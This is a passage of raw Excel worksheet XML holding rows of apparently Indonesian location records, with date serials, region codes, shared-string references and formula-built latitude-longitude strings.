      <c r="I2578" t="s">
        <v>137</v>
      </c>
      <c r="J2578" t="s">
        <v>2622</v>
      </c>
      <c r="L2578" t="s">
        <v>8671</v>
      </c>
      <c r="M2578">
        <v>3525010006</v>
      </c>
      <c r="N2578">
        <v>3525010</v>
      </c>
      <c r="O2578">
        <v>3525</v>
      </c>
      <c r="P2578">
        <v>35</v>
      </c>
      <c r="Q2578" t="s">
        <v>8672</v>
      </c>
      <c r="R2578" t="s">
        <v>8673</v>
      </c>
      <c r="S2578" t="s">
        <v>1368</v>
      </c>
      <c r="T2578" t="s">
        <v>1221</v>
      </c>
      <c r="U2578" s="5">
        <v>11254701</v>
      </c>
      <c r="V2578" s="5" t="s">
        <v>16759</v>
      </c>
      <c r="W2578" s="5">
        <v>-739211</v>
      </c>
      <c r="X2578" t="s">
        <v>20501</v>
      </c>
      <c r="Y2578" t="str">
        <f t="shared" si="40"/>
        <v>-7.39211,112.54701</v>
      </c>
    </row>
    <row r="2579" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2579">
        <v>226164</v>
      </c>
      <c r="B2579" s="1">
        <v>44203</v>
      </c>
      <c r="C2579" s="2">
        <v>0.51974537037037039</v>
      </c>
      <c r="D2579" t="s">
        <v>22</v>
      </c>
      <c r="E2579" t="s">
        <v>23</v>
      </c>
      <c r="F2579" t="s">
        <v>8674</v>
      </c>
      <c r="H2579" t="s">
        <v>26</v>
      </c>
      <c r="I2579" t="s">
        <v>27</v>
      </c>
      <c r="J2579" t="s">
        <v>2622</v>
      </c>
      <c r="L2579" t="s">
        <v>8675</v>
      </c>
      <c r="M2579">
        <v>3515140007</v>
      </c>
      <c r="N2579">
        <v>3515140</v>
      </c>
      <c r="O2579">
        <v>3515</v>
      </c>
      <c r="P2579">
        <v>35</v>
      </c>
      <c r="Q2579" t="s">
        <v>8664</v>
      </c>
      <c r="R2579" t="s">
        <v>1927</v>
      </c>
      <c r="S2579" t="s">
        <v>1928</v>
      </c>
      <c r="T2579" t="s">
        <v>1221</v>
      </c>
      <c r="U2579" s="5">
        <v>11277715</v>
      </c>
      <c r="V2579" s="5" t="s">
        <v>16760</v>
      </c>
      <c r="W2579" s="5">
        <v>-736074</v>
      </c>
      <c r="X2579" t="s">
        <v>20502</v>
      </c>
      <c r="Y2579" t="str">
        <f t="shared" si="40"/>
        <v>-7.36074,112.77715</v>
      </c>
    </row>
    <row r="2580" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2580">
        <v>226165</v>
      </c>
      <c r="B2580" s="1">
        <v>44203</v>
      </c>
      <c r="C2580" s="2">
        <v>0.52262731481481484</v>
      </c>
      <c r="D2580" t="s">
        <v>22</v>
      </c>
      <c r="E2580" t="s">
        <v>23</v>
      </c>
      <c r="F2580" t="s">
        <v>8676</v>
      </c>
      <c r="H2580" t="s">
        <v>26</v>
      </c>
      <c r="I2580" t="s">
        <v>1710</v>
      </c>
      <c r="J2580" t="s">
        <v>2622</v>
      </c>
      <c r="L2580" t="s">
        <v>8677</v>
      </c>
      <c r="M2580">
        <v>3515140008</v>
      </c>
      <c r="N2580">
        <v>3515140</v>
      </c>
      <c r="O2580">
        <v>3515</v>
      </c>
      <c r="P2580">
        <v>35</v>
      </c>
      <c r="Q2580" t="s">
        <v>8678</v>
      </c>
      <c r="R2580" t="s">
        <v>1927</v>
      </c>
      <c r="S2580" t="s">
        <v>1928</v>
      </c>
      <c r="T2580" t="s">
        <v>1221</v>
      </c>
      <c r="U2580" s="5">
        <v>11276634</v>
      </c>
      <c r="V2580" s="5" t="s">
        <v>16761</v>
      </c>
      <c r="W2580" s="5">
        <v>-735381</v>
      </c>
      <c r="X2580" t="s">
        <v>20503</v>
      </c>
      <c r="Y2580" t="str">
        <f t="shared" si="40"/>
        <v>-7.35381,112.76634</v>
      </c>
    </row>
    <row r="2581" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2581">
        <v>226166</v>
      </c>
      <c r="B2581" s="1">
        <v>44203</v>
      </c>
      <c r="C2581" s="2">
        <v>0.984837962962963</v>
      </c>
      <c r="D2581" t="s">
        <v>22</v>
      </c>
      <c r="E2581" t="s">
        <v>23</v>
      </c>
      <c r="F2581" t="s">
        <v>8679</v>
      </c>
      <c r="G2581" t="s">
        <v>8680</v>
      </c>
      <c r="H2581" t="s">
        <v>26</v>
      </c>
      <c r="I2581" t="s">
        <v>137</v>
      </c>
      <c r="J2581" t="s">
        <v>2622</v>
      </c>
      <c r="M2581">
        <v>3506210007</v>
      </c>
      <c r="N2581">
        <v>3506210</v>
      </c>
      <c r="O2581">
        <v>3506</v>
      </c>
      <c r="P2581">
        <v>35</v>
      </c>
      <c r="Q2581" t="s">
        <v>7287</v>
      </c>
      <c r="R2581" t="s">
        <v>8681</v>
      </c>
      <c r="S2581" t="s">
        <v>8365</v>
      </c>
      <c r="T2581" t="s">
        <v>1221</v>
      </c>
      <c r="U2581" s="5">
        <v>11201354</v>
      </c>
      <c r="V2581" s="5" t="s">
        <v>16762</v>
      </c>
      <c r="W2581" s="5">
        <v>-776493</v>
      </c>
      <c r="X2581" t="s">
        <v>20504</v>
      </c>
      <c r="Y2581" t="str">
        <f t="shared" si="40"/>
        <v>-7.76493,112.01354</v>
      </c>
    </row>
    <row r="2582" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2582">
        <v>226167</v>
      </c>
      <c r="B2582" s="1">
        <v>44203</v>
      </c>
      <c r="C2582" s="2">
        <v>0.98883101851851851</v>
      </c>
      <c r="D2582" t="s">
        <v>22</v>
      </c>
      <c r="E2582" t="s">
        <v>23</v>
      </c>
      <c r="F2582" t="s">
        <v>8682</v>
      </c>
      <c r="G2582" t="s">
        <v>8683</v>
      </c>
      <c r="H2582" t="s">
        <v>26</v>
      </c>
      <c r="I2582" t="s">
        <v>137</v>
      </c>
      <c r="J2582" t="s">
        <v>2622</v>
      </c>
      <c r="M2582">
        <v>3506201007</v>
      </c>
      <c r="N2582">
        <v>3506201</v>
      </c>
      <c r="O2582">
        <v>3506</v>
      </c>
      <c r="P2582">
        <v>35</v>
      </c>
      <c r="Q2582" t="s">
        <v>8684</v>
      </c>
      <c r="R2582" t="s">
        <v>8685</v>
      </c>
      <c r="S2582" t="s">
        <v>8365</v>
      </c>
      <c r="T2582" t="s">
        <v>1221</v>
      </c>
      <c r="U2582" s="5">
        <v>11202501</v>
      </c>
      <c r="V2582" s="5" t="s">
        <v>16763</v>
      </c>
      <c r="W2582" s="5">
        <v>-779114</v>
      </c>
      <c r="X2582" t="s">
        <v>20505</v>
      </c>
      <c r="Y2582" t="str">
        <f t="shared" si="40"/>
        <v>-7.79114,112.02501</v>
      </c>
    </row>
    <row r="2583" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2583">
        <v>226168</v>
      </c>
      <c r="B2583" s="1">
        <v>44204</v>
      </c>
      <c r="C2583" s="2">
        <v>0.46832175925925923</v>
      </c>
      <c r="D2583" t="s">
        <v>22</v>
      </c>
      <c r="E2583" t="s">
        <v>23</v>
      </c>
      <c r="F2583" t="s">
        <v>8686</v>
      </c>
      <c r="G2583" t="s">
        <v>8687</v>
      </c>
      <c r="H2583" t="s">
        <v>26</v>
      </c>
      <c r="I2583" t="s">
        <v>3062</v>
      </c>
      <c r="J2583" t="s">
        <v>8688</v>
      </c>
      <c r="L2583" t="s">
        <v>8689</v>
      </c>
      <c r="M2583">
        <v>3374160010</v>
      </c>
      <c r="N2583">
        <v>3374160</v>
      </c>
      <c r="O2583">
        <v>3374</v>
      </c>
      <c r="P2583">
        <v>33</v>
      </c>
      <c r="Q2583" t="s">
        <v>2119</v>
      </c>
      <c r="R2583" t="s">
        <v>2120</v>
      </c>
      <c r="S2583" t="s">
        <v>1334</v>
      </c>
      <c r="T2583" t="s">
        <v>1134</v>
      </c>
      <c r="U2583" s="5">
        <v>11029255</v>
      </c>
      <c r="V2583" s="5" t="s">
        <v>16764</v>
      </c>
      <c r="W2583" s="5">
        <v>-697572</v>
      </c>
      <c r="X2583" t="s">
        <v>20506</v>
      </c>
      <c r="Y2583" t="str">
        <f t="shared" si="40"/>
        <v>-6.97572,110.29255</v>
      </c>
    </row>
    <row r="2584" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2584">
        <v>226170</v>
      </c>
      <c r="B2584" s="1">
        <v>44206</v>
      </c>
      <c r="C2584" s="2">
        <v>0.18259259259259261</v>
      </c>
      <c r="D2584" t="s">
        <v>22</v>
      </c>
      <c r="E2584" t="s">
        <v>23</v>
      </c>
      <c r="F2584" t="s">
        <v>8690</v>
      </c>
      <c r="G2584" t="s">
        <v>8691</v>
      </c>
      <c r="H2584" t="s">
        <v>26</v>
      </c>
      <c r="I2584" t="s">
        <v>4678</v>
      </c>
      <c r="J2584" t="s">
        <v>8692</v>
      </c>
      <c r="L2584" t="s">
        <v>8693</v>
      </c>
      <c r="M2584">
        <v>2102060005</v>
      </c>
      <c r="N2584">
        <v>2102060</v>
      </c>
      <c r="O2584">
        <v>2102</v>
      </c>
      <c r="P2584">
        <v>21</v>
      </c>
      <c r="Q2584" t="s">
        <v>8694</v>
      </c>
      <c r="R2584" t="s">
        <v>8695</v>
      </c>
      <c r="S2584" t="s">
        <v>8696</v>
      </c>
      <c r="T2584" t="s">
        <v>8697</v>
      </c>
      <c r="U2584" s="5">
        <v>10459905</v>
      </c>
      <c r="V2584" s="5" t="s">
        <v>16765</v>
      </c>
      <c r="W2584" s="5">
        <v>85261</v>
      </c>
      <c r="X2584" t="s">
        <v>14447</v>
      </c>
      <c r="Y2584" t="str">
        <f t="shared" si="40"/>
        <v>0.85261,104.59905</v>
      </c>
    </row>
    <row r="2585" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2585">
        <v>226171</v>
      </c>
      <c r="B2585" s="1">
        <v>44206</v>
      </c>
      <c r="C2585" s="2">
        <v>0.3298611111111111</v>
      </c>
      <c r="D2585" t="s">
        <v>2648</v>
      </c>
      <c r="E2585" t="s">
        <v>23</v>
      </c>
      <c r="G2585" t="s">
        <v>8698</v>
      </c>
      <c r="H2585" t="s">
        <v>26</v>
      </c>
      <c r="J2585" t="s">
        <v>8699</v>
      </c>
      <c r="L2585" t="s">
        <v>8700</v>
      </c>
      <c r="M2585">
        <v>3175030001</v>
      </c>
      <c r="N2585">
        <v>3175030</v>
      </c>
      <c r="O2585">
        <v>3175</v>
      </c>
      <c r="P2585">
        <v>31</v>
      </c>
      <c r="Q2585" t="s">
        <v>1574</v>
      </c>
      <c r="R2585" t="s">
        <v>1563</v>
      </c>
      <c r="S2585" t="s">
        <v>547</v>
      </c>
      <c r="T2585" t="s">
        <v>33</v>
      </c>
      <c r="U2585" s="5">
        <v>10686289</v>
      </c>
      <c r="V2585" s="5" t="s">
        <v>16766</v>
      </c>
      <c r="W2585" s="5">
        <v>-614303</v>
      </c>
      <c r="X2585" t="s">
        <v>20507</v>
      </c>
      <c r="Y2585" t="str">
        <f t="shared" si="40"/>
        <v>-6.14303,106.86289</v>
      </c>
    </row>
    <row r="2586" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2586">
        <v>226181</v>
      </c>
      <c r="B2586" s="1">
        <v>44206</v>
      </c>
      <c r="C2586" s="2">
        <v>0.36319444444444443</v>
      </c>
      <c r="D2586" t="s">
        <v>2648</v>
      </c>
      <c r="E2586" t="s">
        <v>23</v>
      </c>
      <c r="G2586" t="s">
        <v>8701</v>
      </c>
      <c r="H2586" t="s">
        <v>26</v>
      </c>
      <c r="J2586" t="s">
        <v>5962</v>
      </c>
      <c r="L2586" t="s">
        <v>8702</v>
      </c>
      <c r="M2586">
        <v>3175060005</v>
      </c>
      <c r="N2586">
        <v>3175060</v>
      </c>
      <c r="O2586">
        <v>3175</v>
      </c>
      <c r="P2586">
        <v>31</v>
      </c>
      <c r="Q2586" t="s">
        <v>5964</v>
      </c>
      <c r="R2586" t="s">
        <v>2279</v>
      </c>
      <c r="S2586" t="s">
        <v>547</v>
      </c>
      <c r="T2586" t="s">
        <v>33</v>
      </c>
      <c r="U2586" s="5">
        <v>10693936</v>
      </c>
      <c r="V2586" s="5" t="s">
        <v>16767</v>
      </c>
      <c r="W2586" s="5">
        <v>-613110</v>
      </c>
      <c r="X2586" t="s">
        <v>19152</v>
      </c>
      <c r="Y2586" t="str">
        <f t="shared" si="40"/>
        <v>-6.13110,106.93936</v>
      </c>
    </row>
    <row r="2587" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2587">
        <v>226183</v>
      </c>
      <c r="B2587" s="1">
        <v>44206</v>
      </c>
      <c r="C2587" s="2">
        <v>0.46364583333333331</v>
      </c>
      <c r="D2587" t="s">
        <v>22</v>
      </c>
      <c r="E2587" t="s">
        <v>23</v>
      </c>
      <c r="F2587" t="s">
        <v>8703</v>
      </c>
      <c r="H2587" t="s">
        <v>26</v>
      </c>
      <c r="I2587" t="s">
        <v>76</v>
      </c>
      <c r="J2587" t="s">
        <v>2627</v>
      </c>
      <c r="L2587" t="s">
        <v>8704</v>
      </c>
      <c r="M2587">
        <v>3204180004</v>
      </c>
      <c r="N2587">
        <v>3204180</v>
      </c>
      <c r="O2587">
        <v>3204</v>
      </c>
      <c r="P2587">
        <v>32</v>
      </c>
      <c r="Q2587" t="s">
        <v>6499</v>
      </c>
      <c r="R2587" t="s">
        <v>8705</v>
      </c>
      <c r="S2587" t="s">
        <v>1464</v>
      </c>
      <c r="T2587" t="s">
        <v>42</v>
      </c>
      <c r="U2587" s="5">
        <v>10754980</v>
      </c>
      <c r="V2587" s="5" t="s">
        <v>16768</v>
      </c>
      <c r="W2587" s="5">
        <v>-702997</v>
      </c>
      <c r="X2587" t="s">
        <v>20508</v>
      </c>
      <c r="Y2587" t="str">
        <f t="shared" si="40"/>
        <v>-7.02997,107.54980</v>
      </c>
    </row>
    <row r="2588" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2588">
        <v>226184</v>
      </c>
      <c r="B2588" s="1">
        <v>44207</v>
      </c>
      <c r="C2588" s="2">
        <v>0.34068287037037037</v>
      </c>
      <c r="D2588" t="s">
        <v>22</v>
      </c>
      <c r="E2588" t="s">
        <v>23</v>
      </c>
      <c r="F2588" t="s">
        <v>8706</v>
      </c>
      <c r="G2588" t="s">
        <v>8707</v>
      </c>
      <c r="H2588" t="s">
        <v>26</v>
      </c>
      <c r="I2588" t="s">
        <v>961</v>
      </c>
      <c r="J2588" t="s">
        <v>2622</v>
      </c>
      <c r="M2588">
        <v>3528050015</v>
      </c>
      <c r="N2588">
        <v>3528050</v>
      </c>
      <c r="O2588">
        <v>3528</v>
      </c>
      <c r="P2588">
        <v>35</v>
      </c>
      <c r="Q2588" t="s">
        <v>8573</v>
      </c>
      <c r="R2588" t="s">
        <v>8574</v>
      </c>
      <c r="S2588" t="s">
        <v>8574</v>
      </c>
      <c r="T2588" t="s">
        <v>1221</v>
      </c>
      <c r="U2588" s="5">
        <v>11347868</v>
      </c>
      <c r="V2588" s="5" t="s">
        <v>16733</v>
      </c>
      <c r="W2588" s="5">
        <v>-715471</v>
      </c>
      <c r="X2588" t="s">
        <v>20509</v>
      </c>
      <c r="Y2588" t="str">
        <f t="shared" si="40"/>
        <v>-7.15471,113.47868</v>
      </c>
    </row>
    <row r="2589" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2589">
        <v>226185</v>
      </c>
      <c r="B2589" s="1">
        <v>44207</v>
      </c>
      <c r="C2589" s="2">
        <v>0.34410879629629632</v>
      </c>
      <c r="D2589" t="s">
        <v>22</v>
      </c>
      <c r="E2589" t="s">
        <v>23</v>
      </c>
      <c r="F2589" t="s">
        <v>8708</v>
      </c>
      <c r="G2589" t="s">
        <v>8709</v>
      </c>
      <c r="H2589" t="s">
        <v>26</v>
      </c>
      <c r="I2589" t="s">
        <v>271</v>
      </c>
      <c r="J2589" t="s">
        <v>2622</v>
      </c>
      <c r="L2589" t="s">
        <v>8710</v>
      </c>
      <c r="M2589">
        <v>3524190001</v>
      </c>
      <c r="N2589">
        <v>3524190</v>
      </c>
      <c r="O2589">
        <v>3524</v>
      </c>
      <c r="P2589">
        <v>35</v>
      </c>
      <c r="Q2589" t="s">
        <v>8711</v>
      </c>
      <c r="R2589" t="s">
        <v>8712</v>
      </c>
      <c r="S2589" t="s">
        <v>8713</v>
      </c>
      <c r="T2589" t="s">
        <v>1221</v>
      </c>
      <c r="U2589" s="5">
        <v>11234619</v>
      </c>
      <c r="V2589" s="5" t="s">
        <v>16769</v>
      </c>
      <c r="W2589" s="5">
        <v>-704780</v>
      </c>
      <c r="X2589" t="s">
        <v>20510</v>
      </c>
      <c r="Y2589" t="str">
        <f t="shared" si="40"/>
        <v>-7.04780,112.34619</v>
      </c>
    </row>
    <row r="2590" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2590">
        <v>226186</v>
      </c>
      <c r="B2590" s="1">
        <v>44207</v>
      </c>
      <c r="C2590" s="2">
        <v>0.45733796296296297</v>
      </c>
      <c r="D2590" t="s">
        <v>22</v>
      </c>
      <c r="E2590" t="s">
        <v>23</v>
      </c>
      <c r="F2590" t="s">
        <v>8714</v>
      </c>
      <c r="G2590" t="s">
        <v>8715</v>
      </c>
      <c r="H2590" t="s">
        <v>26</v>
      </c>
      <c r="I2590" t="s">
        <v>1633</v>
      </c>
      <c r="J2590" t="s">
        <v>2622</v>
      </c>
      <c r="L2590" t="s">
        <v>8716</v>
      </c>
      <c r="M2590">
        <v>3528050008</v>
      </c>
      <c r="N2590">
        <v>3528050</v>
      </c>
      <c r="O2590">
        <v>3528</v>
      </c>
      <c r="P2590">
        <v>35</v>
      </c>
      <c r="Q2590" t="s">
        <v>8717</v>
      </c>
      <c r="R2590" t="s">
        <v>8574</v>
      </c>
      <c r="S2590" t="s">
        <v>8574</v>
      </c>
      <c r="T2590" t="s">
        <v>1221</v>
      </c>
      <c r="U2590" s="5">
        <v>11348262</v>
      </c>
      <c r="V2590" s="5" t="s">
        <v>16770</v>
      </c>
      <c r="W2590" s="5">
        <v>-716055</v>
      </c>
      <c r="X2590" t="s">
        <v>20511</v>
      </c>
      <c r="Y2590" t="str">
        <f t="shared" si="40"/>
        <v>-7.16055,113.48262</v>
      </c>
    </row>
    <row r="2591" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2591">
        <v>226187</v>
      </c>
      <c r="B2591" s="1">
        <v>44208</v>
      </c>
      <c r="C2591" s="2">
        <v>0.20196759259259259</v>
      </c>
      <c r="D2591" t="s">
        <v>22</v>
      </c>
      <c r="E2591" t="s">
        <v>23</v>
      </c>
      <c r="F2591" t="s">
        <v>8718</v>
      </c>
      <c r="G2591" t="s">
        <v>8719</v>
      </c>
      <c r="H2591" t="s">
        <v>26</v>
      </c>
      <c r="I2591" t="s">
        <v>271</v>
      </c>
      <c r="J2591" t="s">
        <v>6509</v>
      </c>
      <c r="L2591" t="s">
        <v>8720</v>
      </c>
      <c r="M2591">
        <v>6301040001</v>
      </c>
      <c r="N2591">
        <v>6301040</v>
      </c>
      <c r="O2591">
        <v>6301</v>
      </c>
      <c r="P2591">
        <v>63</v>
      </c>
      <c r="Q2591" t="s">
        <v>8721</v>
      </c>
      <c r="R2591" t="s">
        <v>8722</v>
      </c>
      <c r="S2591" t="s">
        <v>7537</v>
      </c>
      <c r="T2591" t="s">
        <v>6513</v>
      </c>
      <c r="U2591" s="5">
        <v>11470190</v>
      </c>
      <c r="V2591" s="5" t="s">
        <v>16771</v>
      </c>
      <c r="W2591" s="5">
        <v>-361698</v>
      </c>
      <c r="X2591" t="s">
        <v>20512</v>
      </c>
      <c r="Y2591" t="str">
        <f t="shared" si="40"/>
        <v>-3.61698,114.70190</v>
      </c>
    </row>
    <row r="2592" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2592">
        <v>226188</v>
      </c>
      <c r="B2592" s="1">
        <v>44208</v>
      </c>
      <c r="C2592" s="2">
        <v>0.33756944444444442</v>
      </c>
      <c r="D2592" t="s">
        <v>22</v>
      </c>
      <c r="E2592" t="s">
        <v>23</v>
      </c>
      <c r="F2592" t="s">
        <v>8723</v>
      </c>
      <c r="G2592" t="s">
        <v>8724</v>
      </c>
      <c r="H2592" t="s">
        <v>26</v>
      </c>
      <c r="I2592" t="s">
        <v>5188</v>
      </c>
      <c r="J2592" t="s">
        <v>2622</v>
      </c>
      <c r="L2592" t="s">
        <v>8725</v>
      </c>
      <c r="M2592">
        <v>3516130014</v>
      </c>
      <c r="N2592">
        <v>3516130</v>
      </c>
      <c r="O2592">
        <v>3516</v>
      </c>
      <c r="P2592">
        <v>35</v>
      </c>
      <c r="Q2592" t="s">
        <v>8726</v>
      </c>
      <c r="R2592" t="s">
        <v>8727</v>
      </c>
      <c r="S2592" t="s">
        <v>8728</v>
      </c>
      <c r="T2592" t="s">
        <v>1221</v>
      </c>
      <c r="U2592" s="5">
        <v>11239121</v>
      </c>
      <c r="V2592" s="5" t="s">
        <v>16772</v>
      </c>
      <c r="W2592" s="5">
        <v>-747276</v>
      </c>
      <c r="X2592" t="s">
        <v>20513</v>
      </c>
      <c r="Y2592" t="str">
        <f t="shared" si="40"/>
        <v>-7.47276,112.39121</v>
      </c>
    </row>
    <row r="2593" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2593">
        <v>226189</v>
      </c>
      <c r="B2593" s="1">
        <v>44208</v>
      </c>
      <c r="C2593" s="2">
        <v>0.34349537037037042</v>
      </c>
      <c r="D2593" t="s">
        <v>22</v>
      </c>
      <c r="E2593" t="s">
        <v>23</v>
      </c>
      <c r="F2593" t="s">
        <v>8729</v>
      </c>
      <c r="G2593" t="s">
        <v>8730</v>
      </c>
      <c r="H2593" t="s">
        <v>26</v>
      </c>
      <c r="I2593" t="s">
        <v>80</v>
      </c>
      <c r="J2593" t="s">
        <v>2622</v>
      </c>
      <c r="L2593" t="s">
        <v>8731</v>
      </c>
      <c r="M2593">
        <v>3517160005</v>
      </c>
      <c r="N2593">
        <v>3517160</v>
      </c>
      <c r="O2593">
        <v>3517</v>
      </c>
      <c r="P2593">
        <v>35</v>
      </c>
      <c r="Q2593" t="s">
        <v>8732</v>
      </c>
      <c r="R2593" t="s">
        <v>8669</v>
      </c>
      <c r="S2593" t="s">
        <v>340</v>
      </c>
      <c r="T2593" t="s">
        <v>1221</v>
      </c>
      <c r="U2593" s="5">
        <v>11239001</v>
      </c>
      <c r="V2593" s="5" t="s">
        <v>16773</v>
      </c>
      <c r="W2593" s="5">
        <v>-747041</v>
      </c>
      <c r="X2593" t="s">
        <v>20514</v>
      </c>
      <c r="Y2593" t="str">
        <f t="shared" si="40"/>
        <v>-7.47041,112.39001</v>
      </c>
    </row>
    <row r="2594" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2594">
        <v>226190</v>
      </c>
      <c r="B2594" s="1">
        <v>44208</v>
      </c>
      <c r="C2594" s="2">
        <v>0.39934027777777775</v>
      </c>
      <c r="D2594" t="s">
        <v>22</v>
      </c>
      <c r="E2594" t="s">
        <v>23</v>
      </c>
      <c r="F2594" t="s">
        <v>8733</v>
      </c>
      <c r="G2594" t="s">
        <v>8734</v>
      </c>
      <c r="H2594" t="s">
        <v>26</v>
      </c>
      <c r="I2594" t="s">
        <v>517</v>
      </c>
      <c r="J2594" t="s">
        <v>7509</v>
      </c>
      <c r="L2594" t="s">
        <v>8735</v>
      </c>
      <c r="M2594">
        <v>1372010003</v>
      </c>
      <c r="N2594">
        <v>1372010</v>
      </c>
      <c r="O2594">
        <v>1372</v>
      </c>
      <c r="P2594">
        <v>13</v>
      </c>
      <c r="Q2594" t="s">
        <v>8736</v>
      </c>
      <c r="R2594" t="s">
        <v>8737</v>
      </c>
      <c r="S2594" t="s">
        <v>8738</v>
      </c>
      <c r="T2594" t="s">
        <v>7514</v>
      </c>
      <c r="U2594" s="5">
        <v>10065708</v>
      </c>
      <c r="V2594" s="5" t="s">
        <v>16774</v>
      </c>
      <c r="W2594" s="5">
        <v>-79507</v>
      </c>
      <c r="X2594" t="s">
        <v>20515</v>
      </c>
      <c r="Y2594" t="str">
        <f t="shared" si="40"/>
        <v xml:space="preserve"> -0.79507,100.65708</v>
      </c>
    </row>
    <row r="2595" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2595">
        <v>226191</v>
      </c>
      <c r="B2595" s="1">
        <v>44208</v>
      </c>
      <c r="C2595" s="2">
        <v>0.45143518518518522</v>
      </c>
      <c r="D2595" t="s">
        <v>22</v>
      </c>
      <c r="E2595" t="s">
        <v>23</v>
      </c>
      <c r="F2595" t="s">
        <v>8739</v>
      </c>
      <c r="G2595" t="s">
        <v>8740</v>
      </c>
      <c r="H2595" t="s">
        <v>26</v>
      </c>
      <c r="I2595" t="s">
        <v>666</v>
      </c>
      <c r="J2595" t="s">
        <v>2627</v>
      </c>
      <c r="L2595" t="s">
        <v>8741</v>
      </c>
      <c r="M2595">
        <v>3211020007</v>
      </c>
      <c r="N2595">
        <v>3211020</v>
      </c>
      <c r="O2595">
        <v>3211</v>
      </c>
      <c r="P2595">
        <v>32</v>
      </c>
      <c r="Q2595" t="s">
        <v>8742</v>
      </c>
      <c r="R2595" t="s">
        <v>1796</v>
      </c>
      <c r="S2595" t="s">
        <v>1797</v>
      </c>
      <c r="T2595" t="s">
        <v>42</v>
      </c>
      <c r="U2595" s="5">
        <v>10782714</v>
      </c>
      <c r="V2595" s="5" t="s">
        <v>16775</v>
      </c>
      <c r="W2595" s="5">
        <v>-697005</v>
      </c>
      <c r="X2595" t="s">
        <v>20516</v>
      </c>
      <c r="Y2595" t="str">
        <f t="shared" si="40"/>
        <v>-6.97005,107.82714</v>
      </c>
    </row>
    <row r="2596" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2596">
        <v>226192</v>
      </c>
      <c r="B2596" s="1">
        <v>44208</v>
      </c>
      <c r="C2596" s="2">
        <v>0.45810185185185182</v>
      </c>
      <c r="D2596" t="s">
        <v>22</v>
      </c>
      <c r="E2596" t="s">
        <v>23</v>
      </c>
      <c r="F2596" t="s">
        <v>8743</v>
      </c>
      <c r="G2596" t="s">
        <v>8744</v>
      </c>
      <c r="H2596" t="s">
        <v>26</v>
      </c>
      <c r="I2596" t="s">
        <v>137</v>
      </c>
      <c r="J2596" t="s">
        <v>2622</v>
      </c>
      <c r="M2596">
        <v>3573010002</v>
      </c>
      <c r="N2596">
        <v>3573010</v>
      </c>
      <c r="O2596">
        <v>3573</v>
      </c>
      <c r="P2596">
        <v>35</v>
      </c>
      <c r="Q2596" t="s">
        <v>8745</v>
      </c>
      <c r="R2596" t="s">
        <v>7408</v>
      </c>
      <c r="S2596" t="s">
        <v>6321</v>
      </c>
      <c r="T2596" t="s">
        <v>1221</v>
      </c>
      <c r="U2596" s="5">
        <v>11264253</v>
      </c>
      <c r="V2596" s="5" t="s">
        <v>16776</v>
      </c>
      <c r="W2596" s="5">
        <v>-803542</v>
      </c>
      <c r="X2596" t="s">
        <v>20517</v>
      </c>
      <c r="Y2596" t="str">
        <f t="shared" si="40"/>
        <v>-8.03542,112.64253</v>
      </c>
    </row>
    <row r="2597" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2597">
        <v>226193</v>
      </c>
      <c r="B2597" s="1">
        <v>44208</v>
      </c>
      <c r="C2597" s="2">
        <v>0.56968750000000001</v>
      </c>
      <c r="D2597" t="s">
        <v>22</v>
      </c>
      <c r="E2597" t="s">
        <v>23</v>
      </c>
      <c r="F2597" t="s">
        <v>8746</v>
      </c>
      <c r="G2597" t="s">
        <v>8747</v>
      </c>
      <c r="H2597" t="s">
        <v>26</v>
      </c>
      <c r="I2597" t="s">
        <v>7646</v>
      </c>
      <c r="J2597" t="s">
        <v>6509</v>
      </c>
      <c r="L2597" t="s">
        <v>8748</v>
      </c>
      <c r="M2597">
        <v>6303060008</v>
      </c>
      <c r="N2597">
        <v>6303060</v>
      </c>
      <c r="O2597">
        <v>6303</v>
      </c>
      <c r="P2597">
        <v>63</v>
      </c>
      <c r="Q2597" t="s">
        <v>8749</v>
      </c>
      <c r="R2597" t="s">
        <v>8750</v>
      </c>
      <c r="S2597" t="s">
        <v>8751</v>
      </c>
      <c r="T2597" t="s">
        <v>6513</v>
      </c>
      <c r="U2597" s="5">
        <v>11493672</v>
      </c>
      <c r="V2597" s="5" t="s">
        <v>16777</v>
      </c>
      <c r="W2597" s="5">
        <v>-331680</v>
      </c>
      <c r="X2597" t="s">
        <v>20518</v>
      </c>
      <c r="Y2597" t="str">
        <f t="shared" si="40"/>
        <v>-3.31680,114.93672</v>
      </c>
    </row>
    <row r="2598" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2598">
        <v>226194</v>
      </c>
      <c r="B2598" s="1">
        <v>44209</v>
      </c>
      <c r="C2598" s="2">
        <v>5.6944444444444443E-2</v>
      </c>
      <c r="D2598" t="s">
        <v>2648</v>
      </c>
      <c r="E2598" t="s">
        <v>23</v>
      </c>
      <c r="G2598" t="s">
        <v>8752</v>
      </c>
      <c r="H2598" t="s">
        <v>26</v>
      </c>
      <c r="J2598" t="s">
        <v>28</v>
      </c>
      <c r="L2598" t="s">
        <v>8753</v>
      </c>
      <c r="M2598">
        <v>3174020005</v>
      </c>
      <c r="N2598">
        <v>3174020</v>
      </c>
      <c r="O2598">
        <v>3174</v>
      </c>
      <c r="P2598">
        <v>31</v>
      </c>
      <c r="Q2598" t="s">
        <v>30</v>
      </c>
      <c r="R2598" t="s">
        <v>31</v>
      </c>
      <c r="S2598" t="s">
        <v>32</v>
      </c>
      <c r="T2598" t="s">
        <v>33</v>
      </c>
      <c r="U2598" s="5">
        <v>10676959</v>
      </c>
      <c r="V2598" s="5" t="s">
        <v>16778</v>
      </c>
      <c r="W2598" s="5">
        <v>-617569</v>
      </c>
      <c r="X2598" t="s">
        <v>20519</v>
      </c>
